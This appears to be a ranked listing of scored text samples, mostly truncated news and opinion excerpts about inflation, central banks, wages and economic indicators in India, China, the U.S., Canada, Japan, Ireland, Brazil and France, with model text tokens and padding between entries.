interfere in their decision. + +So it’s a great relief that the RBI stood firm. Its independence has been questioned of late, partly because of the circumstances in which Rajan left, under pressure from lawmakers in New Delhi, and partly because of its supine acceptance of the government’s controversial decision in November to withdraw 86% of India’s currency from circulation. The government should never have asked for the meeting; but, given that it did, the members of the MPC were right to refuse. + +Also read: India’s war of the Mandarins leaves companies as victims + +In any case, they knew what the government was likely to say: “Please, for the love of God, cut rates." India is confronting a growth slowdown that is born, most agree, out of a sustained crisis in private investment. It doesn’t take a meeting with the government for the MPC to know that. Yet it has ignored the pleas of officials—and of many in the private sector—and kept rates steady. + +This determination emerges from another relatively recent reform: an agreement between the central bank and the government to shift to targeting consumer price inflation. A clear goal for the RBI—rather than a vague admonition that it should care about growth, prices and the exchange rate all at once—adds to its independence and clarifies its approach to monetary policy. But the government has grown increasingly frustrated. After all, not only is growth slowing, but the RBI has refused to reduce interest rates even as the inflation rate has fallen to historic lows. + +Some argue that the MPC is simply ignoring or misreading the evidence. Even the RBI had to admit that its inflation forecast for the first quarter was off by an unusually large 1.4 +================================================================================ +Rank = 19; Score = 2621440.0 +<|begin_of_text|>The latest data on the Chinese economy released on Saturday show exports down 8% year-on-year. By any measure you pick, China’s expansion is losing steam. + +But working out how much it’s slowing by is extremely hard to do. + +Based on a series of different indicators, the economy is currently growing between about 4% and 7% a year. That’s not exactly a small gap, and the truth matters enormously for China, Asia and the rest of the world. The country has a ballooning debt issue that will be much harder to deal with if growth is slow. + +Bank of America Merrill Lynch global economist Gustavo Reis and his team sent out a note over the weekend discussing just how much Chinese growth is slowing by a series of different measures. + +One of the measures they have looked at is an analyst favourite: The Li Keqiang Index (LKI). Back in 2007, Li reportedly told a US ambassador that he personally looked at the economy with an index made up of three parts: Electricity production, rail traffic, and lending. + +Here’s how those three look: + +Loans are rising, but electricity production is up by less than 5% year-on-year, and rail traffic is shrinking at rates last seen during the depths of the 2008-09 financial crisis. + +So it’s fair to say that it’s not a pretty picture as far as China’s Premier’s favourite economic index is concerned. Here’s how it looks in comparison to GDP: + +The BAI (broad activity index) brought together by BAML economists tracks GDP much more closely — it’s a composite of 20 different indicators. + +But yet another indicator, the LEAP index, which brings together “power output, crude steel output, cement output, auto sales, housing starts, railway cargo traffic and medium- to long-term loans,” suggests Chinese GDP is even more overblown than the Li Keqiang Index does. + +So it’s something of a mystery. + +There seem to be at least three possibilities: + +The government is lying. This doesn’t seem difficult to imagine. The credibility of the Chinese government is attached to both its ability to provide growth and its ability to exert a high level of control over the economy. Slower growth isn’t something it would like to admit. + +This doesn’t seem difficult to imagine. The credibility of the Chinese government is attached to both its ability to provide growth and its ability to exert a high level of control over the economy. Slower growth isn’t something it would like to admit. China’s +================================================================================ +Rank = 20; Score = 2473984.0 +<|begin_of_text|>ANY central banker worth his salt knows that his job is to aim for price stability. But stability of which prices? Should central banks worry only about consumer-price inflation, or also about the prices of assets, such as equities and property? Mr Greenspan asked this question in December 1996 when he made his famous speech about “irrational exuberance” in the stockmarket. Since then Wall Street has climbed another 70%. How to deal with asset prices is now one of the most serious dilemmas of monetary policy. + +Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor's Picks. + +Consumer-price inflation may currently be modest, but another sort of inflation, in share prices, is rampant. Many central bankers are privately worried about the lofty heights share prices have reached, but they do not believe there is much they can or should do about it. Such diffidence could prove damaging. Price stability, remember, is only a means to the end of maximum sustainable growth. And asset-price inflation can be even more harmful to growth than ordinary inflation. + +Policymakers often claim that by pursuing price stability they will reduce the risk of boom and bust. But history suggests that, although price stability does deliver big benefits, it does not guarantee economic and financial stability. Indeed, there is reason to believe that financial bubbles may be more likely to develop during periods of low CPI inflation. The two biggest bubbles this century—America's in the 1920s and Japan's in the 1980s—both developed when inflation was modest. + +One explanation is that when inflation is subdued, interest rates look low, thanks to “money illusion”: people fail to notice that in real terms rates are just as high as in more inflationary times. This encourages a borrowing binge and prompts investors to chase higher and hence riskier returns. When interest rates are low, people are also able to borrow a much bigger multiple of their incomes to finance speculative investment. At the same time, price stability can sometimes encourage economic euphoria. With seemingly no reason for central banks to raise interest rates, people start to expect that the expansion will continue indefinitely. This false sense of security encourages investors to take bigger risks, and lenders to relax their standards. + +Flemming Larsen, the deputy director of research at the IMF, pointed out in a recent speech that there was much evidence that an economy can overheat even at a time of price stability as conventionally defined. Excess demand shows up instead in balance sheets and asset prices. Traditional indicators of +================================================================================ +Rank = 21; Score = 2457600.0 +<|begin_of_text|>Colleges need to adapt so that university education doesn't become too expensive for all. + +University life. (Photo: M. Spencer Green, AP) Story Highlights Administrative bloat at American colleges and universities is out of hand. + +One calculation shows college tuition increased from 1978 to 2011 at an annual rate of 7.45%. + +Now colleges and universities are actually facing declining enrollments, and even credit downgrades. + +"Why am I paying so much tuition to people whose job seems to be telling me to call someone else?" + +That was my daughter's lament last week as she tried to pry an essential form out of her college's labyrinthine bureaucracy, but it's a question that many Americans should be asking. Administrative bloat at American colleges and universities is out of hand, and it's probably the biggest cause of the skyrocketing tuitions that afflict students and parents today. + +Everyone knows that tuitions have skyrocketed, though many may not appreciate the full extent of the problem. As University of Michigan economics and finance professor Mark Perry has calculated, college tuition increased from 1978 to 2011 at an annual rate of 7.45%. That far outpaced health-care costs, which increased by 5.8%, and housing, which, notwithstanding the bubble, increased at 4.3%. Family incomes, on the other hand, barely kept up with the Consumer Price Index, which grew at an annual rate of 3.8%. + +That has led many students (and sometimes their co-signing parents) into a nightmare of debt, as student loans have been used to fill the gap. Now colleges and universities are actually facing declining enrollments, and in some cases even credit downgrades as their ability to endlessly raise tuition comes into question. But why has tuition risen so fast? + +Some commentators blame lazy, overpaid faculty. But while faculty teaching loads are somewhat lower than they were decades ago, faculty-student ratios have been quite stable over the past several decades, while the ratio of administrators and staff to students has become much less favorable. In his book on administrative bloat, The Fall Of The Faculty, Johns Hopkins professor Benjamin Ginsberg reports that although student-faculty ratios fell slightly between 1975 and 2005, from 16-to-1 to 15-to-1, the student-to-administrator ratio fell from 84-to-1 to 68-to-1, and the student-to-professional-staff ratio fell from 50-to-1 to 21-to-1. Gins +================================================================================ +Rank = 22; Score = 2457600.0 +<|begin_of_text|>A Wall St. sign is seen outside the entrance of NYSE Thomson Reuters By Tanya Agrawal + +(Reuters) - U.S. stock index futures fell on Wednesday as Chinese stocks had another roller coaster ride and as investors await the minutes from last month's Federal Reserve meeting for clues on when interest rates will be increased. + +* While the health of the U.S. economy appears to be stabilizing, the effect of the yuan devaluation and other macro factors are playing on investor's minds. The Fed minutes will be released at 2 p.m. ET. + +* Economists believe the Fed will probably raise rates twice this year, with the first hike coming in September. Investors are still not fully convinced of a September hike, but most are betting a rate hike will occur by the end of year. + +* Chinese stocks reversed sharp declines and ended higher after the central bank injected more funds into the financial system for a second day in a bid to calm panicky markets. + +* The People's Bank of China devalued the yuan last week, triggering an avalanche of selling by investors globally who feared Beijing wanted to engineer a much sharper decline to support weak exports. + +* The Chinese market gyrations kept commodity prices under pressure, with oil and copper near six-year lows. + +* Other data due Wednesday is expected to show consumer prices rose 0.2 percent in July, less than the 0.3 percent rise in June. The Consumer Price Index data is due at 8:30 a.m. ET. + +* Lowe's shares fell 1.6 percent to $71.85 in premarket trading after the No.2 U.S. home improvement chain's quarterly profit missed expectations. + +* Yum Brands rose 1.5 percent to $85.50, a day after the owner of the KFC and Pizza Hut chains announced new leadership for its China division as activist investors lobby the company to spin off that business. + +* Staples fell 1.6 percent to $13.93 after the office supplies retailer reported quarterly revenue slightly below analysts' estimates, hurt by a stronger dollar. + +Futures snapshot at 7:07 a.m. ET: + +* S&P 500 e-minis were down 5.25 points, or 0.25 percent, with 143,877 contracts traded. + +* Nasdaq 100 e-minis were down 11 points, or 0.24 percent, on volume of 23,476 contracts. + +* Dow e-minis <1YMc1> were down 57 points, +================================================================================ +Rank = 23; Score = 2441216.0 +<|begin_of_text|>(Updates with link to most and least expensive cities to live in the U.S.) + +For the first time, the Commerce Department’s Bureau of Economic Analysis released price-adjusted estimates of personal income for states and metropolitan areas for 2008 to 2012, and it shows that, at the very least, it’s more expensive for Members of Congress to live in the nation’s capital on their $174,000 salary than in any state from which they hail. + +The results show the District of Columbia, in 2012, had the highest “regional price parity” of any state. Granted, D.C.’s really a city, not a state, and set against their more natural comparisons, it ranks fifth, behind the Urban Honolulu area, New York-Newark-Jersey City, San Jose-Sunnyvale-Santa Clara, Bridgeport-Stamford-Norwalk and San Francisco-Oakland-Hayward. Beaches, hedge funds and technology are the key to prices, evidently. + +The cheapest metro areas, by this methodology, were Danville, Ill.; Jefferson City, Mo.; Jackson, Tenn.; Jonesboro, Ark.; and Rome, Ga. + +See related look at most and least expensive cities to live in the U.S. + +Put another way,it costs 54% more to live in Honolulu than in Danville. + +The top five states (outside of D.C.) were Hawaii, New York, New Jersey, California and Maryland, and the bottom five states were Mississippi, Arkansas, Alabama, Missouri and South Dakota. So, it costs 36% more to live in Hawaii than in Mississippi. + +The BEA says it produced the report in large part so people and businesses can have a better understanding how their personal income may be impacted by a job change or move. There is regional consumer price index data, but those statistics aren’t designed for regional or city comparisons, whereas this data is, a spokesman says. + +— Steve Goldstein + +Follow Steve on Twitter @mktwgoldstein + +Follow Capitol Report @capitolreport + +Also read: Is it time to freak out about housing? + +Why the housing sector won’t save the broader economy<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 24; Score = 2326528.0 +<|begin_of_text|>Students carry signs to protest Act 10 in February of 2011 near D.C. Everest High School in Weston. Daily Herald Media file photo Chad Dally/Wausau Daily HeraldD.C. Everest High School students, from left, Candace Perria, Nick Marvin, Emily Wurzer and Ashley Rawlings carry signs to protest Gov. Scott Walker's move to alter Wisconsin's union rights. The action at D.C. Everest was part of a mass protest at school districts throughout the area, including Merrill, Wausau and Mosinee. (Photo: File) + +The Fond du Lac County Finance Committee is considering a proposal that would provide a workaround of the restrictions of the controversial collective bargaining law Act 10 for members of a public employees union. + +County Human Resources Director Michael Marx sent a memorandum to the county's Finance Committee in May explaining the limitations the law placed on the AFSCME local 1366E Social Services union. + +Act 10 removed the ability of public employees unions to negotiate for anything but a pay increase limited to the Consumer Price Index. The county board approved a 1.57-percent increase for the union's members, which is the maximum allowed under the law this year. + +Other non-union county employees received a 2-percent increase without similar restrictions at the beginning of the year. + +"In other words, this group is being penalized by the state because they didn't decertify their union," Board Chairman Martin Farrell said. + +Marx recommended the board approve a supplemental pay increase for the more than 70 employees affected to make up for the difference. The extra pay would work like a bonus, being paid once in a lump sum in the first pay period of December. + +The extra pay would also be based on the number of hours worked, ranging from 7 to 10 cents, depending on the employee's current wages, and would be increased by 1.5 times for overtime. Marx said the payments would amount to between $140 to $190, depending on the employee's wages. + +Next year's supplemental pay would have to be reapproved by the board, and every year after, and can't be a part of the union's next contract negotiations. That's because the supplemental pay can't be part of the union's contact under Act 10 and is entirely at the discretion of the board, Marx said. + +"This is just the least problematic way of getting the increase to the employees without creating extra coding in our system," County Executive Al Buechel said. "When you look at personnel administration +================================================================================ +Rank = 25; Score = 2195456.0 +<|begin_of_text|>New Delhi: Showing signs of recovery, industrial output rose to nearly 3-year high of 6.4 percent in August on improvement in manufacturing and capital goods while retail inflation remained with in comfort zone. + +The manufacturing sector, which constitutes over 75 percent of the index, grew by 6.9 percent in August, while the capital goods output rose by 21.8 percent in the month indicating a recovery. + +ALSO READ: Industrial production grows at a near 3-year high of 6.4% in August + +Commenting on the twin macro economic data, Chief Economic Advisor Arvind Subramanian said, "Encouraging news on Indian economy. IIP growth increased to 6.4 percent, consistent with indirect tax revenue performance. Core inflation moderate." + +The previous high of factory output growth was recorded in October 2012 at 8.4 percent. The factory output had grown by 0.5 percent in August last year. + +Industrial output, measured in terms of the Index of Industrial Production (IIP), was at 4.1 percent in the April-August period against 3 percent in the year-ago period, the data released by the Central Statistics Office (CSO) today showed. + +As regard retail inflation, the Consumer Price Index rose to 4.41 percent in September from 3.74 percent in August this year but remained in comfort zone. RBI has projected 5.8 percent retail inflation by January, 2016. + +ALSO READ: Retail inflation rises to 4.41% in September on dearer food items + +"The growth in manufacturing seems to be accelerating and we are hopeful of higher growth in the coming months.. Government?s efforts to revive manufacturing has started yielding results," said FICCI Secretary General A Didar Singh. + +Chief Economist, India Ratings & Research Devendra Kumar Pant said, "Sharp fall in inflation and monetary easing has increased demand for consumer durable. This is partially due to initiation of festival season. Bond market is likely to respond favourably to IIP data and bond yields are likely to fall by around 5 basis points in tomorrow's trade." I + +Meanwhile, the IIP growth for July has been revised slightly downwards to 4.1 percent from provisional estimate of 4.2 percent last month. + +Commenting on the data, Assocham President Rana Kapoor + +said, "..Pleased to see finally the green shoots of economic activity getting converted into strong industrial growth figures." + +"On the whole, these estimates put forward certain +================================================================================ +Rank = 26; Score = 2195456.0 +<|begin_of_text|>Noah Zivitz Managing Editor, BNN Bloomberg Follow|Archive + +At least one Canadian billionaire has apparently decided to pack up and leave the country because of Bill Morneau’s plan to tighten up tax rules. Business Council of Canada CEO John Manley – a former Liberal finance minister and deputy prime minister – told the Canadian Press that a successful business leader informed him he left the country with “billions of dollars” as a result of the government’s controversial tax plan. And Manley is warning more could head for the exits. "You won't know about it because they're not going to buy ads or report it — they'll just go," he told CP. Today we’ll dive deeper into the threat of capital and talent fleeing the country. + +CPI RISES IN AUGUST + +The cost of living picked up a bit last month. Statistics Canada reporting today that the consumer price index rose 1.4 per cent year-over-year in August, compared with 1.2 per cent in July. Of all categories, gasoline prices rose the most in August at 8.6 per cent. + +And there's some evidence of consumer fatigue in a separate StatsCan release. Total retail sales rose 0.4 per cent in July. Excluding autos, the gain was just 0.2 per cent -- far below the 0.7 per cent rise in July. + +NEW NORTH KOREA THREATS + +North Korea’s Foreign Minister warned today his country “might consider” testing a hydrogen bomb over the Pacific Ocean as a show of force in response to Donald Trump’s threat to “totally destroy” the country. And Kim Jong Un took aim at Trump in a statement, calling the U.S. president a “frightened dog” uttering “unprecedented rude nonsense.” For now, the latest rhetoric isn’t unnerving investors -- with global stocks and gold little changed. + +NAFTA ROUND THREE + +Canada, Mexico and the U.S. will resume NAFTA negotiations tomorrow in Ottawa. Today, it’s all about photo ops and preparatory meetings. Notably, Foreign Affairs Minister Chrystia Freeland meets with her NAFTA council and Brian Mulroney today in Toronto. Meanwhile, The Globe and Mail is reporting the U.S. will present all its detailed demands in the third round of negotiations, which run until the middle of next week. We’ll get insight today on Canada’s negotiating strategy with ex-Conservative Party interim leader Rona Ambrose at 2:30 p.m. ET. + +OTHER NOTABLE +================================================================================ +Rank = 27; Score = 1818624.0 +<|begin_of_text|>TOKYO (Reuters) - Nearly two-thirds of Japanese companies do not plan to hike their workers’ wages this year, a Reuters poll showed, a blow to Prime Minister Shinzo Abe’s campaign for higher pay to spur a recovery and a way to end two decades of deflation. + +People walk past an electronic board showing stock prices outside a brokerage at a business district in Tokyo, Japan, January 4, 2017. Picture taken on January 4, 2017. REUTERS/Kim Kyung-Hoon + +The Reuters Corporate Survey, conducted Jan. 4-17, also found that most wage gains over the past four years since Abe came to power have been minimal and that nearly one-quarter of firms have implemented none at all. + +In each of those four years, just before labor and management kick off their annual “shunto” talks - which set the tone for broader wages - Abe has urged companies to raise wages to boost households’ purchasing power and stimulate spending. + +But Japan Inc has generally resisted Abe’s plea. Although the yen has weakened recently, many companies were hurt badly by last year’s spike in the currency and are loath to commit to higher wages in the face of uncertainty amid threats about trade barriers by new U.S. President Donald Trump. + +“Manufacturers’ profits may expand this year given the current yen weakening, but that could change depending on what Trump says and does,” said Hidenobu Tokuda, senior economist at Mizuho Research Institute, who reviewed the survey results. + +As such, companies appear to opt to reward employees with one-off bonus payments after profits are secured, rather than promising a base pay raise. + +“Without base pay rise, wage growth is unlikely to accelerate. On the other hand, prices may increase as oil prices rebound, which will curb (inflation-adjusted) real wages and hurt households’ purchasing power,” Tokuda said. + +The monthly poll of 531 big and mid-size firms, in which about 240 responded, found 63 percent said they were not planning a base pay hike. + +In Japan, an increase is pivotal for sustainable wage growth as the base salary accounts for the bulk of monthly wages. Base pay rises had been virtually frozen for over a decade since the early 2000s, until Abe swept to power in late 2012 with a pledge to reboot the moribund economy. + +Prices as measured by core consumer inflation excluding fresh food have risen roughly 3.5 percent over the past four years. But much of that came from the 201 +================================================================================ +Rank = 28; Score = 1810432.0 +<|begin_of_text|>For five months, the Luas strike was seemingly intractable, incapable of solution, before a change of heart by one shop steward broke the log-jam late last week. + +However, if the Luas settlement came suddenly in the end, its effect will live long, as other transport workers set the 18 per cent increase over 4½ years as the starting point for their own demands. + +In a fortnight’s time the Labour Court will hear claims from Dublin Bus workers who want rises of 20-30 per cent over a number of years. + +The impact of the Luas dispute on the industrial relations landscape is hard to overstate, since it has ratcheted up expectations, altered mindsets and created new ideas of what is possible. It has also shown that a hard-fought campaign of disruptive industrial action, in the face of largely hostile media and public opinion, can win rises over and above recent norms. + +The initial 54 per cent pay claim seemed excessive. However, management’s opening position was a deal linked to the Consumer Price Index – one that could be close to zero. + +Supported + +The Labour Court recommendation is considered by unions to have a set an important precedent. Unions such as the NBRU have already signalled they want pay parity between bus and tram drivers. In the absence of any centralised pay bargaining after the collapse of social partnership, prior to the Luas deal, a number of key unions such as Siptu and Mandate have concluded 2-3 per cent deals for the private sector. A survey of private sector employers published by specialist journal Industrial Relations News last March forecast pay deals this year would be an average of 2.2 per cent. + +Under the deal, Luas drivers will receive increases of about 18 per cent phased over 55 months to late 2020 – far more than the company had wanted, but less than they could have received if they had accepted an earlier offer. + +Ahead of trends + +Some, though, contend that if the deal is extended back to October 2014, when the previous agreement expired, then the new increases fall within the 2-3 per cent pay norms. + +However, this argument is unlikely to hold much sway. Last month, Dublin Bus unions rejected a proposal in talks at the Workplace Relations Commission for increases of 8 per cent over four years for its 3,400 staff. + +Siptu is likely to argue to the Labour Court on June 30th that it can accept nothing less than the 18 per cent proposed +================================================================================ +Rank = 29; Score = 1761280.0 +<|begin_of_text|>Chinese Exchanges Suspend Withdrawals for One Month + +In a surprise turn of events, the two largest Chinese Bitcoin exchanges have suspended Bitcoin and Litecoin withdrawals for one month. The news follows China’s central bank inspections at nine smaller Bitcoin exchanges this week. + +Also read: China to Play a ‘Leading Role’ in Bitcoin’s Future + +China’s Central Bank Continues to Shake Up the Bitcoin Market + +Over the past few weeks, Bitcoin spectators have been closely watching Chinese exchanges make significant changes. The People’s Bank of China (PBOC) has been inspecting the country’s Bitcoin exchanges looking for issues with regulatory compliance such as money laundering. So far the top three exchange platforms have ceased margin lending practices and have also added fees to every Bitcoin trade. + +Now, this week the PBOC has visited with smaller exchanges within the region including Chbtc, Haobtc, Btctrade, Yunbi, BTC100, Dahonghuo, Jubi, Bitbay, and Yuanbao. The initial visits had caused the price to drop a touch but quickly rose back to the $1070 range on February 8. The following day on February 9 the exchanges Okcoin and Huobi announced they would suspend BTC and LTC withdrawals for one month which subsequently caused the Bitcoin price to drop 10 percent. + +Both companies have stated their exchanges will be “upgrading” in order to comply with “anti-money laundering efforts, foreign exchange management and other financial laws and regulations.” The pausing of withdrawals and the upgrades are expected to last one month but “may also be substantially ahead of the development process,” says Huobi’s announcement. This “in order to avoid possible illegal transactions that may continue before the system upgrade is complete,” Huobi’s announcement concludes. + +OKCoin, Huobi: will upgrade AML system according to laws & regulations, pausing BTC LTC withdraw during the upgrade. Estimated time: 1 month — cnLedger (@cnLedger) February 9, 2017 + +Avoiding ‘Illegal Transactions’ Until Upgrade Completes + +The third leading Chinese Bitcoin exchange BTCC which has been the most vocal exchange so far, has not made an announcement suspending withdrawals. Currently, the fiat value of Bitcoin rests at $980 per BTC, and the price has fluctuated quite a bit throughout the morning of February 9. Huobi says the suspension will stay in place to avoid any misconduct until their newly designed system is perfected. + +What do you think about Okcoin and Huobi suspending BTC and LTC withdrawals in order to +================================================================================ +Rank = 30; Score = 1753088.0 +<|begin_of_text|>SAO PAULO, Jan 26 (Reuters) - Economists raised sharply their forecasts for Brazil's 2015 inflation rate to a level further exceeding the official target, a weekly central bank poll showed on Monday. Inflation is expected to end 2015 at 6.99 percent, up from 6.67 percent in the prior week's survey and 6.53 percent a month ago, according to the median forecast of about 100 market economists. Brazil's government targets an inflation rate of 4.5 percent, with a tolerance margin of two percentage points. The median estimate for economic growth this year dropped to 0.13 percent from 0.38 percent in the previous week's survey and 0.55 percent a month earlier. (pct) 2015 2016 previous new previous new forecast forecast forecast forecast Consumer inflation 6.67 6.99 5.70 5.60 Exchange rate 2.80 2.80 2.85 2.90 (reais per U.S dollar, end-period) Interest rate 12.50 12.50 11.50 11.50 (end-period) GDP growth 0.38 0.13 1.80 1.54 Industrial output 0.71 0.69 2.65 2.50 (Reporting by Asher Levine; Editing by Toby Chopra)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 31; Score = 1744896.0 +<|begin_of_text|>To see how it works, consider a topic I know well: the recent history of inflation scares. + +More than five years have passed since many conservatives started warning that the Federal Reserve, by taking action to contain the financial crisis and boost the economy, was setting the stage for runaway inflation. And, to be fair, that wasn’t a crazy position to take in 2009; I could have told you it was wrong (and, in fact, I did), but you could see where it was coming from. + +Over time, however, as the promised inflation kept failing to arrive, there should have come a point when the inflationistas conceded their error and moved on. + +In fact, however, few did. Instead, they mostly doubled down on their predictions of doom, and some moved on to conspiracy theorizing, claiming that high inflation was already happening, but was being concealed by government officials. + +Why the bad behavior? Nobody likes admitting to mistakes, and all of us — even those of us who try not to — sometimes engage in motivated reasoning, selectively citing facts to support our preconceptions. + +But hard as it is to admit one’s own errors, it’s much harder to admit that your entire political movement got it badly wrong. Inflation phobia has always been closely bound up with right-wing politics; to admit that this phobia was misguided would have meant conceding that one whole side of the political divide was fundamentally off base about how the economy works. So most of the inflationistas have responded to the failure of their prediction by becoming more, not less, extreme in their dogma, which will make it even harder for them ever to admit that they, and the political movement they serve, have been wrong all along.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 32; Score = 1712128.0 +<|begin_of_text|>How Government Spending Continues to Add Fuel to the Fire + +“France is rotten,” said a friend yesterday. “I don’t know why you came back. Half the people are broke. The other half are crazy… + +“…and you foreigners still come here, pay $1 million for a hole-in-the-wall apartment…and walk around the city and step in dogsh*t.” + +Yes, dear reader, that is a fair description of France circa 2012. The new president, Francois Hollande, says he won’t wait for the private sector to create jobs. He will do it himself. He’ll hire more teachers. Never mind that the payback on educational spending is zero — or less. It sounds good to the lumpen-voters. + +And how will he pay for these new teachers? This week, he is expected to raise taxes on the rich. The top marginal rate, he says, will go up to 75%. And the wealth tax will go up too. + +In short, the elites who control France will soon control, directly, more of it…and more of the rich will move to Switzerland, England or Belgium. + +Rotten…rotten…rotten… + +But here at The 